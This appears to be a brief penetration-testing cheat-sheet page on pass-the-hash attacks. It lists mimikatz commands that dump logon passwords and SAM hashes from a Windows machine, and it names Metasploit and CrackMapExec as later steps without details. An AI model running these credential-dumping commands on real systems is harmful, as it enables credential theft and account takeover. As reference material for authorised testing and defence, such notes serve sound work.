πPass-The-Hash Attacks
Pass-The-Hash
Attack Flow: Pass-the-Hash Attack
1. Locate User Hashes
mimikatz.exe > privilege::debug
mimikatz.exe > sekurlsa::logonpasswords
mimikatz.exe > lsadump::sam2. Pass-the-Hash Attack Using Metasploit
3. Pass-the-Hash Attack Using CrackMapExec
Last updated